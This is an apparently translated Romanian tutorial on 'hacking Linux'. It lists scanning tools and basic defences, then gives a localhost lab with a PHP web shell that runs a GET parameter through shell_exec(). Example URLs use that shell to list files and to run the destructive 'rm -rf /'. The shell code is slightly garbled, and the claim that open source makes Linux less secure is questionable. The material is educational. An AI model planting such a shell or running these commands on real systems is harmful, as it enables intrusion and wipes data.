Hacking Linux OS: Hacking with Ubuntu (Commands Tutorial)

Linux este cel mai utilizat sistem de operare pentru servere, în special pentru serverele web. Este open source; acest lucru înseamnă că oricine poate avea acces la codul sursă. Acest lucru îl face mai puțin sigur în comparație cu alte sisteme de operare, deoarece atacatorii pot studia codul sursă pentru a găsi vulnerabilități. Linux pentru hackeri se referă la exploatarea acestor vulnerabilități pentru a obține acces neautorizat la un sistem.

În acest articol, vă vom prezenta ce este Linux, vulnerabilitățile sale de securitate, hacking-ul cu Ubuntu și contramăsurile pe care le puteți pune în aplicare.

Subiectele abordate în acest tutorial

  • Notă rapidă despre Linux
  • Instrumente de hacking pentru Linux
  • Cum să preveniți hackingul cu Linux
  • Activitate de hacking: Piratarea unui sistem Linux folosind PHP

Notă rapidă despre Linux

Linux este un sistem de operare open source. Există multe distribuții de sisteme de operare bazate pe Linux, cum ar fi Redhat, Fedora și Ubuntu, etc. Spre deosebire de alte sisteme de operare, Linux este mai puțin sigur atunci când vine vorba de securitate. Acest lucru se datorează faptului că codul sursă este disponibil în mod liber, astfel încât este ușor de studiat pentru a găsi vulnerabilități și de a le exploata în comparație cu alte sisteme de operare care nu sunt open source. Linux poate fi utilizat ca sistem de operare pentru servere, desktop, tablete sau dispozitive mobile.

Programele Linux pot fi operate folosind fie GUI, fie comenzi. Comenzile Linux pentru hacking Kali Linux sunt mai eficiente și mai eficace în comparație cu utilizarea GUI. Din acest motiv, este util să cunoașteți comenzile Linux de bază pentru hacking.

Consultați aceste tutoriale https://www.guru99.com/unix-linux-tutorial.html despre cum să începeți cu hacking-ul Kali Linux.

Instrumente de hacking Linux

  • Nessus- acest instrument poate fi folosit pentru hacking Ubuntu, scanează setările de configurare, patch-uri și rețele etc. poate fi găsit la https://www.tenable.com/products/nessus
  • NMap. Acest instrument poate fi utilizat pentru a monitoriza gazdele care rulează pe server și serviciile pe care le utilizează. De asemenea, poate fi utilizat pentru a scana porturile. Se găsește la https://nmap.org/
  • SARA – SARA este acronimul pentru Security Auditor’s Research Assistant. După cum sugerează și numele, acest instrument poate fi folosit pentru a verifica rețelele împotriva unor amenințări cum ar fi SQL Injection, XSS etc. poate fi găsit la http://www-arc.com/sara/sara.html

Lista de mai sus nu este exhaustivă; ea vă oferă o idee despre instrumentele disponibile pentru hacking Ubuntu și hacking sisteme Linux.

Cum să preveniți hacking-ul Linux

Hacking-ul Linux profită de vulnerabilitățile din sistemul de operare. O organizație poate adopta următoarea politică pentru a se proteja împotriva unor astfel de atacuri.

  • Gestionarea patch-urilor – patch-urile repară erorile pe care atacatorii le exploatează pentru a compromite un sistem. O bună politică de gestionare a patch-urilor se va asigura că aplicați în mod constant patch-uri relevante în sistem.
  • Configurarea corectă a sistemului de operare- alte exploatări profită de slăbiciunile din configurația serverului. Numele de utilizator și daemonii inactivi ar trebui să fie dezactivați. Setările implicite, cum ar fi parolele comune pentru aplicații, numele de utilizator implicite și unele numere de port ar trebui modificate.
  • Sistem de detectare a intruziunilor- astfel de instrumente pot fi utilizate pentru a detecta accesul neautorizat la sistem. Unele instrumente au capacitatea de a detecta și de a preveni astfel de atacuri.

Activitate de hacking: Hack un sistem Ubuntu Linux folosind PHP

În acest scenariu practic, vom învăța cum să hackerim cu Ubuntu și vă vom oferi informații de bază despre cum puteți folosi PHP pentru a compromite un Linux. Nu vom viza nicio victimă. Dacă doriți să încercați, puteți instala LAMPP pe mașina dvs. locală.

PHP vine cu două funcții care pot fi folosite pentru a executa comenzi de hacking Linux. Acesta are funcțiile exec() și shell_exec(). Funcția exec() returnează ultima linie de ieșire a comenzii, în timp ce shell_exec() returnează întregul rezultat al comenzii sub forma unui șir de caractere.

În scop demonstrativ, să presupunem că atacatorul gestionează pentru a încărca următorul fișier pe un server web.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

HERE,

Scriptul de mai sus obține comanda din variabila GET numită cmd. Comanda este executată cu ajutorul shell_exec(), iar rezultatele sunt returnate în browser.

Codul de mai sus poate fi exploatat folosind următorul URL

http://localhost/cp/konsole.php?cmd=ls%20-l

AICI,

  • „…konsole.php?cmd=ls%20-l „atribuie valoarea ls -l variabilei cmd.

Comanda din Ubuntu pentru hacking împotriva serverului va fi executată sub forma

shell_exec('ls -l') ;

Executarea codului de mai sus pe un server web dă rezultate similare cu cele de mai jos.

Comanda de mai sus afișează pur și simplu fișierele din directorul curent și permisiunile

Să presupunem că atacatorul trece următoarea comandă

rm -rf /

AICI,

  • „rm” elimină fișierele
  • „rf” face ca comanda rm să fie executată în mod recursiv. Ștergerea tuturor folderelor și fișierelor
  • „/” instruiește comanda să înceapă ștergerea fișierelor din directorul rădăcină

URL-ul de atac ar arăta cam așa

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Rezumat

  • Linux este un sistem de operare popular pentru servere, desktop-uri, tablete și dispozitive mobile.
  • Linux este open source, iar codul sursă poate fi obținut de oricine. Acest lucru face ca vulnerabilitățile să fie ușor de identificat. Este unul dintre cele mai bune sisteme de operare pentru hackeri.
  • Comenzile de hacking de bază și de rețea din Ubuntu sunt valoroase pentru hackerii Linux.
  • Vulnerabilitățile sunt o slăbiciune care poate fi exploatată pentru a compromite un sistem.
  • O securitate bună poate ajuta la protejarea unui sistem de a fi compromis de un atacator.

Lasă un răspuns

Adresa ta de email nu va fi publicată.